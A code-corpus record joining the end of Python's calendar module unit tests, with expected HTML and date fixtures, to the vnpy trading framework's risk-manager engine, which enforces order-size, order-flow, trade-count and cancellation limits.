<tr><td class="noday"> </td><td class="noday"> </td><td class="wed">1</td><td class="thu">2</td><td class="fri">3</td><td class="sat">4</td><td class="sun">5</td></tr>
<tr><td class="mon">6</td><td class="tue">7</td><td class="wed">8</td><td class="thu">9</td><td class="fri">10</td><td class="sat">11</td><td class="sun">12</td></tr>
<tr><td class="mon">13</td><td class="tue">14</td><td class="wed">15</td><td class="thu">16</td><td class="fri">17</td><td class="sat">18</td><td class="sun">19</td></tr>
<tr><td class="mon">20</td><td class="tue">21</td><td class="wed">22</td><td class="thu">23</td><td class="fri">24</td><td class="sat">25</td><td class="sun">26</td></tr>
<tr><td class="mon">27</td><td class="tue">28</td><td class="wed">29</td><td class="thu">30</td><td class="noday"> </td><td class="noday"> </td><td class="noday"> </td></tr>
</table>
</td></tr><tr><td><table border="0" cellpadding="0" cellspacing="0" class="month">
<tr><th colspan="7" class="month">October</th></tr>
<tr><th class="mon">Mon</th><th class="tue">Tue</th><th class="wed">Wed</th><th class="thu">Thu</th><th class="fri">Fri</th><th class="sat">Sat</th><th class="sun">Sun</th></tr>
<tr><td class="noday"> </td><td class="noday"> </td><td class="noday"> </td><td class="noday"> </td><td class="fri">1</td><td class="sat">2</td><td class="sun">3</td></tr>
<tr><td class="mon">4</td><td class="tue">5</td><td class="wed">6</td><td class="thu">7</td><td class="fri">8</td><td class="sat">9</td><td class="sun">10</td></tr>
<tr><td class="mon">11</td><td class="tue">12</td><td class="wed">13</td><td class="thu">14</td><td class="fri">15</td><td class="sat">16</td><td class="sun">17</td></tr>
<tr><td class="mon">18</td><td class="tue">19</td><td class="wed">20</td><td class="thu">21</td><td class="fri">22</td><td class="sat">23</td><td class="sun">24</td></tr>
<tr><td class="mon">25</td><td class="tue">26</td><td class="wed">27</td><td class="thu">28</td><td class="fri">29</td><td class="sat">30</td><td class="sun">31</td></tr>
</table>
</td><td><table border="0" cellpadding="0" cellspacing="0" class="month">
<tr><th colspan="7" class="month">November</th></tr>
<tr><th class="mon">Mon</th><th class="tue">Tue</th><th class="wed">Wed</th><th class="thu">Thu</th><th class="fri">Fri</th><th class="sat">Sat</th><th class="sun">Sun</th></tr>
<tr><td class="mon">1</td><td class="tue">2</td><td class="wed">3</td><td class="thu">4</td><td class="fri">5</td><td class="sat">6</td><td class="sun">7</td></tr>
<tr><td class="mon">8</td><td class="tue">9</td><td class="wed">10</td><td class="thu">11</td><td class="fri">12</td><td class="sat">13</td><td class="sun">14</td></tr>
<tr><td class="mon">15</td><td class="tue">16</td><td class="wed">17</td><td class="thu">18</td><td class="fri">19</td><td class="sat">20</td><td class="sun">21</td></tr>
<tr><td class="mon">22</td><td class="tue">23</td><td class="wed">24</td><td class="thu">25</td><td class="fri">26</td><td class="sat">27</td><td class="sun">28</td></tr>
<tr><td class="mon">29</td><td class="tue">30</td><td class="noday"> </td><td class="noday"> </td><td class="noday"> </td><td class="noday"> </td><td class="noday"> </td></tr>
</table>
</td><td><table border="0" cellpadding="0" cellspacing="0" class="month">
<tr><th colspan="7" class="month">December</th></tr>
<tr><th class="mon">Mon</th><th class="tue">Tue</th><th class="wed">Wed</th><th class="thu">Thu</th><th class="fri">Fri</th><th class="sat">Sat</th><th class="sun">Sun</th></tr>
<tr><td class="noday"> </td><td class="noday"> </td><td class="wed">1</td><td class="thu">2</td><td class="fri">3</td><td class="sat">4</td><td class="sun">5</td></tr>
<tr><td class="mon">6</td><td class="tue">7</td><td class="wed">8</td><td class="thu">9</td><td class="fri">10</td><td class="sat">11</td><td class="sun">12</td></tr>
<tr><td class="mon">13</td><td class="tue">14</td><td class="wed">15</td><td class="thu">16</td><td class="fri">17</td><td class="sat">18</td><td class="sun">19</td></tr>
<tr><td class="mon">20</td><td class="tue">21</td><td class="wed">22</td><td class="thu">23</td><td class="fri">24</td><td class="sat">25</td><td class="sun">26</td></tr>
<tr><td class="mon">27</td><td class="tue">28</td><td class="wed">29</td><td class="thu">30</td><td class="fri">31</td><td class="noday"> </td><td class="noday"> </td></tr>
</table>
</td></tr></table></body>
</html>
"""
result_2004_days = [
[[[0, 0, 0, 1, 2, 3, 4],
[5, 6, 7, 8, 9, 10, 11],
[12, 13, 14, 15, 16, 17, 18],
[19, 20, 21, 22, 23, 24, 25],
[26, 27, 28, 29, 30, 31, 0]],
[[0, 0, 0, 0, 0, 0, 1],
[2, 3, 4, 5, 6, 7, 8],
[9, 10, 11, 12, 13, 14, 15],
[16, 17, 18, 19, 20, 21, 22],
[23, 24, 25, 26, 27, 28, 29]],
[[1, 2, 3, 4, 5, 6, 7],
[8, 9, 10, 11, 12, 13, 14],
[15, 16, 17, 18, 19, 20, 21],
[22, 23, 24, 25, 26, 27, 28],
[29, 30, 31, 0, 0, 0, 0]]],
[[[0, 0, 0, 1, 2, 3, 4],
[5, 6, 7, 8, 9, 10, 11],
[12, 13, 14, 15, 16, 17, 18],
[19, 20, 21, 22, 23, 24, 25],
[26, 27, 28, 29, 30, 0, 0]],
[[0, 0, 0, 0, 0, 1, 2],
[3, 4, 5, 6, 7, 8, 9],
[10, 11, 12, 13, 14, 15, 16],
[17, 18, 19, 20, 21, 22, 23],
[24, 25, 26, 27, 28, 29, 30],
[31, 0, 0, 0, 0, 0, 0]],
[[0, 1, 2, 3, 4, 5, 6],
[7, 8, 9, 10, 11, 12, 13],
[14, 15, 16, 17, 18, 19, 20],
[21, 22, 23, 24, 25, 26, 27],
[28, 29, 30, 0, 0, 0, 0]]],
[[[0, 0, 0, 1, 2, 3, 4],
[5, 6, 7, 8, 9, 10, 11],
[12, 13, 14, 15, 16, 17, 18],
[19, 20, 21, 22, 23, 24, 25],
[26, 27, 28, 29, 30, 31, 0]],
[[0, 0, 0, 0, 0, 0, 1],
[2, 3, 4, 5, 6, 7, 8],
[9, 10, 11, 12, 13, 14, 15],
[16, 17, 18, 19, 20, 21, 22],
[23, 24, 25, 26, 27, 28, 29],
[30, 31, 0, 0, 0, 0, 0]],
[[0, 0, 1, 2, 3, 4, 5],
[6, 7, 8, 9, 10, 11, 12],
[13, 14, 15, 16, 17, 18, 19],
[20, 21, 22, 23, 24, 25, 26],
[27, 28, 29, 30, 0, 0, 0]]],
[[[0, 0, 0, 0, 1, 2, 3],
[4, 5, 6, 7, 8, 9, 10],
[11, 12, 13, 14, 15, 16, 17],
[18, 19, 20, 21, 22, 23, 24],
[25, 26, 27, 28, 29, 30, 31]],
[[1, 2, 3, 4, 5, 6, 7],
[8, 9, 10, 11, 12, 13, 14],
[15, 16, 17, 18, 19, 20, 21],
[22, 23, 24, 25, 26, 27, 28],
[29, 30, 0, 0, 0, 0, 0]],
[[0, 0, 1, 2, 3, 4, 5],
[6, 7, 8, 9, 10, 11, 12],
[13, 14, 15, 16, 17, 18, 19],
[20, 21, 22, 23, 24, 25, 26],
[27, 28, 29, 30, 31, 0, 0]]]
]
result_2004_dates = \
[[['12/29/03 12/30/03 12/31/03 01/01/04 01/02/04 01/03/04 01/04/04',
'01/05/04 01/06/04 01/07/04 01/08/04 01/09/04 01/10/04 01/11/04',
'01/12/04 01/13/04 01/14/04 01/15/04 01/16/04 01/17/04 01/18/04',
'01/19/04 01/20/04 01/21/04 01/22/04 01/23/04 01/24/04 01/25/04',
'01/26/04 01/27/04 01/28/04 01/29/04 01/30/04 01/31/04 02/01/04'],
['01/26/04 01/27/04 01/28/04 01/29/04 01/30/04 01/31/04 02/01/04',
'02/02/04 02/03/04 02/04/04 02/05/04 02/06/04 02/07/04 02/08/04',
'02/09/04 02/10/04 02/11/04 02/12/04 02/13/04 02/14/04 02/15/04',
'02/16/04 02/17/04 02/18/04 02/19/04 02/20/04 02/21/04 02/22/04',
'02/23/04 02/24/04 02/25/04 02/26/04 02/27/04 02/28/04 02/29/04'],
['03/01/04 03/02/04 03/03/04 03/04/04 03/05/04 03/06/04 03/07/04',
'03/08/04 03/09/04 03/10/04 03/11/04 03/12/04 03/13/04 03/14/04',
'03/15/04 03/16/04 03/17/04 03/18/04 03/19/04 03/20/04 03/21/04',
'03/22/04 03/23/04 03/24/04 03/25/04 03/26/04 03/27/04 03/28/04',
'03/29/04 03/30/04 03/31/04 04/01/04 04/02/04 04/03/04 04/04/04']],
[['03/29/04 03/30/04 03/31/04 04/01/04 04/02/04 04/03/04 04/04/04',
'04/05/04 04/06/04 04/07/04 04/08/04 04/09/04 04/10/04 04/11/04',
'04/12/04 04/13/04 04/14/04 04/15/04 04/16/04 04/17/04 04/18/04',
'04/19/04 04/20/04 04/21/04 04/22/04 04/23/04 04/24/04 04/25/04',
'04/26/04 04/27/04 04/28/04 04/29/04 04/30/04 05/01/04 05/02/04'],
['04/26/04 04/27/04 04/28/04 04/29/04 04/30/04 05/01/04 05/02/04',
'05/03/04 05/04/04 05/05/04 05/06/04 05/07/04 05/08/04 05/09/04',
'05/10/04 05/11/04 05/12/04 05/13/04 05/14/04 05/15/04 05/16/04',
'05/17/04 05/18/04 05/19/04 05/20/04 05/21/04 05/22/04 05/23/04',
'05/24/04 05/25/04 05/26/04 05/27/04 05/28/04 05/29/04 05/30/04',
'05/31/04 06/01/04 06/02/04 06/03/04 06/04/04 06/05/04 06/06/04'],
['05/31/04 06/01/04 06/02/04 06/03/04 06/04/04 06/05/04 06/06/04',
'06/07/04 06/08/04 06/09/04 06/10/04 06/11/04 06/12/04 06/13/04',
'06/14/04 06/15/04 06/16/04 06/17/04 06/18/04 06/19/04 06/20/04',
'06/21/04 06/22/04 06/23/04 06/24/04 06/25/04 06/26/04 06/27/04',
'06/28/04 06/29/04 06/30/04 07/01/04 07/02/04 07/03/04 07/04/04']],
[['06/28/04 06/29/04 06/30/04 07/01/04 07/02/04 07/03/04 07/04/04',
'07/05/04 07/06/04 07/07/04 07/08/04 07/09/04 07/10/04 07/11/04',
'07/12/04 07/13/04 07/14/04 07/15/04 07/16/04 07/17/04 07/18/04',
'07/19/04 07/20/04 07/21/04 07/22/04 07/23/04 07/24/04 07/25/04',
'07/26/04 07/27/04 07/28/04 07/29/04 07/30/04 07/31/04 08/01/04'],
['07/26/04 07/27/04 07/28/04 07/29/04 07/30/04 07/31/04 08/01/04',
'08/02/04 08/03/04 08/04/04 08/05/04 08/06/04 08/07/04 08/08/04',
'08/09/04 08/10/04 08/11/04 08/12/04 08/13/04 08/14/04 08/15/04',
'08/16/04 08/17/04 08/18/04 08/19/04 08/20/04 08/21/04 08/22/04',
'08/23/04 08/24/04 08/25/04 08/26/04 08/27/04 08/28/04 08/29/04',
'08/30/04 08/31/04 09/01/04 09/02/04 09/03/04 09/04/04 09/05/04'],
['08/30/04 08/31/04 09/01/04 09/02/04 09/03/04 09/04/04 09/05/04',
'09/06/04 09/07/04 09/08/04 09/09/04 09/10/04 09/11/04 09/12/04',
'09/13/04 09/14/04 09/15/04 09/16/04 09/17/04 09/18/04 09/19/04',
'09/20/04 09/21/04 09/22/04 09/23/04 09/24/04 09/25/04 09/26/04',
'09/27/04 09/28/04 09/29/04 09/30/04 10/01/04 10/02/04 10/03/04']],
[['09/27/04 09/28/04 09/29/04 09/30/04 10/01/04 10/02/04 10/03/04',
'10/04/04 10/05/04 10/06/04 10/07/04 10/08/04 10/09/04 10/10/04',
'10/11/04 10/12/04 10/13/04 10/14/04 10/15/04 10/16/04 10/17/04',
'10/18/04 10/19/04 10/20/04 10/21/04 10/22/04 10/23/04 10/24/04',
'10/25/04 10/26/04 10/27/04 10/28/04 10/29/04 10/30/04 10/31/04'],
['11/01/04 11/02/04 11/03/04 11/04/04 11/05/04 11/06/04 11/07/04',
'11/08/04 11/09/04 11/10/04 11/11/04 11/12/04 11/13/04 11/14/04',
'11/15/04 11/16/04 11/17/04 11/18/04 11/19/04 11/20/04 11/21/04',
'11/22/04 11/23/04 11/24/04 11/25/04 11/26/04 11/27/04 11/28/04',
'11/29/04 11/30/04 12/01/04 12/02/04 12/03/04 12/04/04 12/05/04'],
['11/29/04 11/30/04 12/01/04 12/02/04 12/03/04 12/04/04 12/05/04',
'12/06/04 12/07/04 12/08/04 12/09/04 12/10/04 12/11/04 12/12/04',
'12/13/04 12/14/04 12/15/04 12/16/04 12/17/04 12/18/04 12/19/04',
'12/20/04 12/21/04 12/22/04 12/23/04 12/24/04 12/25/04 12/26/04',
'12/27/04 12/28/04 12/29/04 12/30/04 12/31/04 01/01/05 01/02/05']]]
class OutputTestCase(unittest.TestCase):
def normalize_calendar(self, s):
# Filters out locale dependent strings
def neitherspacenordigit(c):
return not c.isspace() and not c.isdigit()
lines = []
for line in s.splitlines(keepends=False):
# Drop texts, as they are locale dependent
if line and not filter(neitherspacenordigit, line):
lines.append(line)
return lines
def check_htmlcalendar_encoding(self, req, res):
cal = calendar.HTMLCalendar()
self.assertEqual(
cal.formatyearpage(2004, encoding=req).strip(b' \t\n'),
(result_2004_html % {'e': res}).strip(' \t\n').encode(res)
)
def test_output(self):
self.assertEqual(
self.normalize_calendar(calendar.calendar(2004)),
self.normalize_calendar(result_2004_text)
)
def test_output_textcalendar(self):
self.assertEqual(
calendar.TextCalendar().formatyear(2004).strip(),
result_2004_text.strip()
)
def test_output_htmlcalendar_encoding_ascii(self):
self.check_htmlcalendar_encoding('ascii', 'ascii')
def test_output_htmlcalendar_encoding_utf8(self):
self.check_htmlcalendar_encoding('utf-8', 'utf-8')
def test_output_htmlcalendar_encoding_default(self):
self.check_htmlcalendar_encoding(None, sys.getdefaultencoding())
def test_yeardatescalendar(self):
def shrink(cal):
return [[[' '.join('{:02d}/{:02d}/{}'.format(
d.month, d.day, str(d.year)[-2:]) for d in z)
for z in y] for y in x] for x in cal]
self.assertEqual(
shrink(calendar.Calendar().yeardatescalendar(2004)),
result_2004_dates
)
def test_yeardayscalendar(self):
self.assertEqual(
calendar.Calendar().yeardayscalendar(2004),
result_2004_days
)
def test_formatweekheader_short(self):
self.assertEqual(
calendar.TextCalendar().formatweekheader(2),
'Mo Tu We Th Fr Sa Su'
)
def test_formatweekheader_long(self):
self.assertEqual(
calendar.TextCalendar().formatweekheader(9),
' Monday Tuesday Wednesday Thursday '
' Friday Saturday Sunday '
)
def test_formatmonth(self):
self.assertEqual(
calendar.TextCalendar().formatmonth(2004, 1).strip(),
result_2004_01_text.strip()
)
def test_formatmonthname_with_year(self):
self.assertEqual(
calendar.HTMLCalendar().formatmonthname(2004, 1, withyear=True),
'<tr><th colspan="7" class="month">January 2004</th></tr>'
)
def test_formatmonthname_without_year(self):
self.assertEqual(
calendar.HTMLCalendar().formatmonthname(2004, 1, withyear=False),
'<tr><th colspan="7" class="month">January</th></tr>'
)
class CalendarTestCase(unittest.TestCase):
def test_isleap(self):
# Make sure that the return is right for a few years, and
# ensure that the return values are 1 or 0, not just true or
# false (see SF bug #485794). Specific additional tests may
# be appropriate; this tests a single "cycle".
self.assertEqual(calendar.isleap(2000), 1)
self.assertEqual(calendar.isleap(2001), 0)
self.assertEqual(calendar.isleap(2002), 0)
self.assertEqual(calendar.isleap(2003), 0)
def test_setfirstweekday(self):
self.assertRaises(TypeError, calendar.setfirstweekday, 'flabber')
self.assertRaises(ValueError, calendar.setfirstweekday, -1)
self.assertRaises(ValueError, calendar.setfirstweekday, 200)
orig = calendar.firstweekday()
calendar.setfirstweekday(calendar.SUNDAY)
self.assertEqual(calendar.firstweekday(), calendar.SUNDAY)
calendar.setfirstweekday(calendar.MONDAY)
self.assertEqual(calendar.firstweekday(), calendar.MONDAY)
calendar.setfirstweekday(orig)
def test_illegal_weekday_reported(self):
with self.assertRaisesRegex(calendar.IllegalWeekdayError, '123'):
calendar.setfirstweekday(123)
def test_enumerate_weekdays(self):
self.assertRaises(IndexError, calendar.day_abbr.__getitem__, -10)
self.assertRaises(IndexError, calendar.day_name.__getitem__, 10)
self.assertEqual(len([d for d in calendar.day_abbr]), 7)
def test_days(self):
for attr in "day_name", "day_abbr":
value = getattr(calendar, attr)
self.assertEqual(len(value), 7)
self.assertEqual(len(value[:]), 7)
# ensure they're all unique
self.assertEqual(len(set(value)), 7)
# verify it "acts like a sequence" in two forms of iteration
self.assertEqual(value[::-1], list(reversed(value)))
def test_months(self):
for attr in "month_name", "month_abbr":
value = getattr(calendar, attr)
self.assertEqual(len(value), 13)
self.assertEqual(len(value[:]), 13)
self.assertEqual(value[0], "")
# ensure they're all unique
self.assertEqual(len(set(value)), 13)
# verify it "acts like a sequence" in two forms of iteration
self.assertEqual(value[::-1], list(reversed(value)))
def test_locale_calendars(self):
# ensure that Locale{Text,HTML}Calendar resets the locale properly
# (it is still not thread-safe though)
old_october = calendar.TextCalendar().formatmonthname(2010, 10, 10)
try:
calendar.LocaleTextCalendar(locale='').formatmonthname(2010, 10, 10)
except locale.Error:
# cannot set the system default locale -- skip rest of test
return
calendar.LocaleHTMLCalendar(locale='').formatmonthname(2010, 10)
new_october = calendar.TextCalendar().formatmonthname(2010, 10, 10)
self.assertEqual(old_october, new_october)
class MonthCalendarTestCase(unittest.TestCase):
def setUp(self):
self.oldfirstweekday = calendar.firstweekday()
calendar.setfirstweekday(self.firstweekday)
def tearDown(self):
calendar.setfirstweekday(self.oldfirstweekday)
def check_weeks(self, year, month, weeks):
cal = calendar.monthcalendar(year, month)
self.assertEqual(len(cal), len(weeks))
for i in range(len(weeks)):
self.assertEqual(weeks[i], sum(day != 0 for day in cal[i]))
class MondayTestCase(MonthCalendarTestCase):
firstweekday = calendar.MONDAY
def test_february(self):
# A 28-day february starting on monday (7+7+7+7 days)
self.check_weeks(1999, 2, (7, 7, 7, 7))
# A 28-day february starting on tuesday (6+7+7+7+1 days)
self.check_weeks(2005, 2, (6, 7, 7, 7, 1))
# A 28-day february starting on sunday (1+7+7+7+6 days)
self.check_weeks(1987, 2, (1, 7, 7, 7, 6))
# A 29-day february starting on monday (7+7+7+7+1 days)
self.check_weeks(1988, 2, (7, 7, 7, 7, 1))
# A 29-day february starting on tuesday (6+7+7+7+2 days)
self.check_weeks(1972, 2, (6, 7, 7, 7, 2))
# A 29-day february starting on sunday (1+7+7+7+7 days)
self.check_weeks(2004, 2, (1, 7, 7, 7, 7))
def test_april(self):
# A 30-day april starting on monday (7+7+7+7+2 days)
self.check_weeks(1935, 4, (7, 7, 7, 7, 2))
# A 30-day april starting on tuesday (6+7+7+7+3 days)
self.check_weeks(1975, 4, (6, 7, 7, 7, 3))
# A 30-day april starting on sunday (1+7+7+7+7+1 days)
self.check_weeks(1945, 4, (1, 7, 7, 7, 7, 1))
# A 30-day april starting on saturday (2+7+7+7+7 days)
self.check_weeks(1995, 4, (2, 7, 7, 7, 7))
# A 30-day april starting on friday (3+7+7+7+6 days)
self.check_weeks(1994, 4, (3, 7, 7, 7, 6))
def test_december(self):
# A 31-day december starting on monday (7+7+7+7+3 days)
self.check_weeks(1980, 12, (7, 7, 7, 7, 3))
# A 31-day december starting on tuesday (6+7+7+7+4 days)
self.check_weeks(1987, 12, (6, 7, 7, 7, 4))
# A 31-day december starting on sunday (1+7+7+7+7+2 days)
self.check_weeks(1968, 12, (1, 7, 7, 7, 7, 2))
# A 31-day december starting on thursday (4+7+7+7+6 days)
self.check_weeks(1988, 12, (4, 7, 7, 7, 6))
# A 31-day december starting on friday (3+7+7+7+7 days)
self.check_weeks(2017, 12, (3, 7, 7, 7, 7))
# A 31-day december starting on saturday (2+7+7+7+7+1 days)
self.check_weeks(2068, 12, (2, 7, 7, 7, 7, 1))
class SundayTestCase(MonthCalendarTestCase):
firstweekday = calendar.SUNDAY
def test_february(self):
# A 28-day february starting on sunday (7+7+7+7 days)
self.check_weeks(2009, 2, (7, 7, 7, 7))
# A 28-day february starting on monday (6+7+7+7+1 days)
self.check_weeks(1999, 2, (6, 7, 7, 7, 1))
# A 28-day february starting on saturday (1+7+7+7+6 days)
self.check_weeks(1997, 2, (1, 7, 7, 7, 6))
# A 29-day february starting on sunday (7+7+7+7+1 days)
self.check_weeks(2004, 2, (7, 7, 7, 7, 1))
# A 29-day february starting on monday (6+7+7+7+2 days)
self.check_weeks(1960, 2, (6, 7, 7, 7, 2))
# A 29-day february starting on saturday (1+7+7+7+7 days)
self.check_weeks(1964, 2, (1, 7, 7, 7, 7))
def test_april(self):
# A 30-day april starting on sunday (7+7+7+7+2 days)
self.check_weeks(1923, 4, (7, 7, 7, 7, 2))
# A 30-day april starting on monday (6+7+7+7+3 days)
self.check_weeks(1918, 4, (6, 7, 7, 7, 3))
# A 30-day april starting on saturday (1+7+7+7+7+1 days)
self.check_weeks(1950, 4, (1, 7, 7, 7, 7, 1))
# A 30-day april starting on friday (2+7+7+7+7 days)
self.check_weeks(1960, 4, (2, 7, 7, 7, 7))
# A 30-day april starting on thursday (3+7+7+7+6 days)
self.check_weeks(1909, 4, (3, 7, 7, 7, 6))
def test_december(self):
# A 31-day december starting on sunday (7+7+7+7+3 days)
self.check_weeks(2080, 12, (7, 7, 7, 7, 3))
# A 31-day december starting on monday (6+7+7+7+4 days)
self.check_weeks(1941, 12, (6, 7, 7, 7, 4))
# A 31-day december starting on saturday (1+7+7+7+7+2 days)
self.check_weeks(1923, 12, (1, 7, 7, 7, 7, 2))
# A 31-day december starting on wednesday (4+7+7+7+6 days)
self.check_weeks(1948, 12, (4, 7, 7, 7, 6))
# A 31-day december starting on thursday (3+7+7+7+7 days)
self.check_weeks(1927, 12, (3, 7, 7, 7, 7))
# A 31-day december starting on friday (2+7+7+7+7+1 days)
self.check_weeks(1995, 12, (2, 7, 7, 7, 7, 1))
class TimegmTestCase(unittest.TestCase):
TIMESTAMPS = [0, 10, 100, 1000, 10000, 100000, 1000000,
1234567890, 1262304000, 1275785153,]
def test_timegm(self):
for secs in self.TIMESTAMPS:
tuple = time.gmtime(secs)
self.assertEqual(secs, calendar.timegm(tuple))
class MonthRangeTestCase(unittest.TestCase):
def test_january(self):
# Tests valid lower boundary case.
self.assertEqual(calendar.monthrange(2004,1), (3,31))
def test_february_leap(self):
# Tests February during leap year.
self.assertEqual(calendar.monthrange(2004,2), (6,29))
def test_february_nonleap(self):
# Tests February in non-leap year.
self.assertEqual(calendar.monthrange(2010,2), (0,28))
def test_december(self):
# Tests valid upper boundary case.
self.assertEqual(calendar.monthrange(2004,12), (2,31))
def test_zeroth_month(self):
# Tests low invalid boundary case.
with self.assertRaises(calendar.IllegalMonthError):
calendar.monthrange(2004, 0)
def test_thirteenth_month(self):
# Tests high invalid boundary case.
with self.assertRaises(calendar.IllegalMonthError):
calendar.monthrange(2004, 13)
def test_illegal_month_reported(self):
with self.assertRaisesRegex(calendar.IllegalMonthError, '65'):
calendar.monthrange(2004, 65)
class LeapdaysTestCase(unittest.TestCase):
def test_no_range(self):
# test when no range i.e. two identical years as args
self.assertEqual(calendar.leapdays(2010,2010), 0)
def test_no_leapdays(self):
# test when no leap years in range
self.assertEqual(calendar.leapdays(2010,2011), 0)
def test_no_leapdays_upper_boundary(self):
# test no leap years in range, when upper boundary is a leap year
self.assertEqual(calendar.leapdays(2010,2012), 0)
def test_one_leapday_lower_boundary(self):
# test when one leap year in range, lower boundary is leap year
self.assertEqual(calendar.leapdays(2012,2013), 1)
def test_several_leapyears_in_range(self):
self.assertEqual(calendar.leapdays(1997,2020), 5)
class ConsoleOutputTestCase(unittest.TestCase):
def test_outputs_bytes(self):
(return_code, stdout, stderr) = assert_python_ok('-m', 'calendar', '--type=html', '2010')
self.assertEqual(stdout[:6], b'<?xml ')
def test_main():
support.run_unittest(
OutputTestCase,
CalendarTestCase,
MondayTestCase,
SundayTestCase,
TimegmTestCase,
MonthRangeTestCase,
LeapdaysTestCase,
ConsoleOutputTestCase
)
if __name__ == "__main__":
test_main()
| gpl-3.0 | 9,221,925,756,879,070,000 | 55.078287 | 206 | 0.577716 | false |
cmbclh/vnpy1.7 | build/lib/vnpy/trader/app/riskManager/rmEngine.py | 1 | 9304 | # encoding: UTF-8
'''
本文件中实现了风控引擎,用于提供一系列常用的风控功能:
1. 委托流控(单位时间内最大允许发出的委托数量)
2. 总成交限制(每日总成交数量限制)
3. 单笔委托的委托数量控制
'''
import json
import platform
from vnpy.event import Event
from vnpy.trader.vtEvent import *
from vnpy.trader.vtFunction import getJsonPath
from vnpy.trader.vtGateway import VtLogData
from vnpy.trader.vtConstant import (EMPTY_INT, EMPTY_FLOAT,EMPTY_STRING, EMPTY_UNICODE)
########################################################################
class RmEngine(object):
"""风控引擎"""
settingFileName = 'RM_setting.json'
settingFilePath = getJsonPath(settingFileName, __file__)
name = u'风控模块'
#----------------------------------------------------------------------
def __init__(self, mainEngine, eventEngine):
"""Constructor"""
self.mainEngine = mainEngine
self.eventEngine = eventEngine
# 绑定自身到主引擎的风控引擎引用上
mainEngine.rmEngine = self
# 是否启动风控
self.active = False
# 流控相关
self.orderFlowCount = EMPTY_INT # 单位时间内委托计数
self.orderFlowLimit = EMPTY_INT # 委托限制
self.orderFlowClear = EMPTY_INT # 计数清空时间(秒)
self.orderFlowTimer = EMPTY_INT # 计数清空时间计时
# 单笔委托相关
self.orderSizeLimit = EMPTY_INT # 单笔委托最大限制
# 成交统计相关
self.tradeCount = EMPTY_INT # 当日成交合约数量统计
self.tradeLimit = EMPTY_INT # 当日成交合约数量限制
# 单品种撤单统计
self.orderCancelLimit = EMPTY_INT # 撤单总次数限制
self.orderCancelDict = {} # 单一合约对应撤单次数的字典
# 活动合约相关
self.workingOrderLimit = EMPTY_INT # 活动合约最大限制
self.loadSetting()
self.registerEvent()
#----------------------------------------------------------------------
def loadSetting(self):
"""读取配置"""
with open(self.settingFilePath) as f:
d = json.load(f)
# 设置风控参数
self.active = d['active']
self.orderFlowLimit = d['orderFlowLimit']
self.orderFlowClear = d['orderFlowClear']
self.orderSizeLimit = d['orderSizeLimit']
self.tradeLimit = d['tradeLimit']
self.workingOrderLimit = d['workingOrderLimit']
self.orderCancelLimit = d['orderCancelLimit']
#----------------------------------------------------------------------
def saveSetting(self):
"""保存风控参数"""
with open(self.settingFilePath, 'w') as f:
# 保存风控参数
d = {}
d['active'] = self.active
d['orderFlowLimit'] = self.orderFlowLimit
d['orderFlowClear'] = self.orderFlowClear
d['orderSizeLimit'] = self.orderSizeLimit
d['tradeLimit'] = self.tradeLimit
d['workingOrderLimit'] = self.workingOrderLimit
d['orderCancelLimit'] = self.orderCancelLimit
# 写入json
jsonD = json.dumps(d, indent=4)
f.write(jsonD)
#----------------------------------------------------------------------
def registerEvent(self):
"""注册事件监听"""
self.eventEngine.register(EVENT_TRADE, self.updateTrade)
self.eventEngine.register(EVENT_TIMER, self.updateTimer)
self.eventEngine.register(EVENT_ORDER, self.updateOrder)
#----------------------------------------------------------------------
def updateOrder(self, event):
"""更新成交数据"""
# 只需要统计撤单成功的委托
order = event.dict_['data']
if order.status != STATUS_CANCELLED:
return
if order.symbol not in self.orderCancelDict:
self.orderCancelDict[order.symbol] = 1
else:
self.orderCancelDict[order.symbol] += 1
#----------------------------------------------------------------------
def updateTrade(self, event):
"""更新成交数据"""
trade = event.dict_['data']
self.tradeCount += trade.volume
#----------------------------------------------------------------------
def updateTimer(self, event):
"""更新定时器"""
self.orderFlowTimer += 1
# 如果计时超过了流控清空的时间间隔,则执行清空
if self.orderFlowTimer >= self.orderFlowClear:
self.orderFlowCount = 0
self.orderFlowTimer = 0
#----------------------------------------------------------------------
def writeRiskLog(self, content):
"""快速发出日志事件"""
# 发出报警提示音
if platform.uname() == 'Windows':
import winsound
winsound.PlaySound("SystemHand", winsound.SND_ASYNC)
# 发出日志事件
log = VtLogData()
log.logContent = content
log.gatewayName = self.name
event = Event(type_=EVENT_LOG)
event.dict_['data'] = log
self.eventEngine.put(event)
#----------------------------------------------------------------------
def checkRisk(self, orderReq):
"""检查风险"""
# 如果没有启动风控检查,则直接返回成功
if not self.active:
return True
# 检查委托数量
if orderReq.volume > self.orderSizeLimit:
self.writeRiskLog(u'单笔委托数量%s,超过限制%s'
%(orderReq.volume, self.orderSizeLimit))
return False
# 检查成交合约量
if self.tradeCount >= self.tradeLimit:
self.writeRiskLog(u'今日总成交合约数量%s,超过限制%s'
%(self.tradeCount, self.tradeLimit))
return False
# 检查流控
if self.orderFlowCount >= self.orderFlowLimit:
self.writeRiskLog(u'委托流数量%s,超过限制每%s秒%s'
%(self.orderFlowCount, self.orderFlowClear, self.orderFlowLimit))
return False
# 检查总活动合约
workingOrderCount = len(self.mainEngine.getAllWorkingOrders())
if workingOrderCount >= self.workingOrderLimit:
self.writeRiskLog(u'当前活动委托数量%s,超过限制%s'
%(workingOrderCount, self.workingOrderLimit))
return False
# 检查撤单次数
if orderReq.symbol in self.orderCancelDict and self.orderCancelDict[orderReq.symbol] >= self.orderCancelLimit:
self.writeRiskLog(u'当日%s撤单次数%s,超过限制%s'
%(orderReq.symbol, self.orderCancelDict[orderReq.symbol], self.orderCancelLimit))
return False
# 对于通过风控的委托,增加流控计数
self.orderFlowCount += 1
return True
#----------------------------------------------------------------------
def clearOrderFlowCount(self):
"""清空流控计数"""
self.orderFlowCount = 0
self.writeRiskLog(u'清空流控计数')
#----------------------------------------------------------------------
def clearTradeCount(self):
"""清空成交数量计数"""
self.tradeCount = 0
self.writeRiskLog(u'清空总成交计数')
#----------------------------------------------------------------------
def setOrderFlowLimit(self, n):
"""设置流控限制"""
self.orderFlowLimit = n
#----------------------------------------------------------------------
def setOrderFlowClear(self, n):
"""设置流控清空时间"""
self.orderFlowClear = n
#----------------------------------------------------------------------
def setOrderSizeLimit(self, n):
"""设置委托最大限制"""
self.orderSizeLimit = n
#----------------------------------------------------------------------
def setTradeLimit(self, n):
"""设置成交限制"""
self.tradeLimit = n
#----------------------------------------------------------------------
def setWorkingOrderLimit(self, n):
"""设置活动合约限制"""
self.workingOrderLimit = n
#----------------------------------------------------------------------
def setOrderCancelLimit(self, n):
"""设置单合约撤单次数上限"""
self.orderCancelLimit = n
#----------------------------------------------------------------------
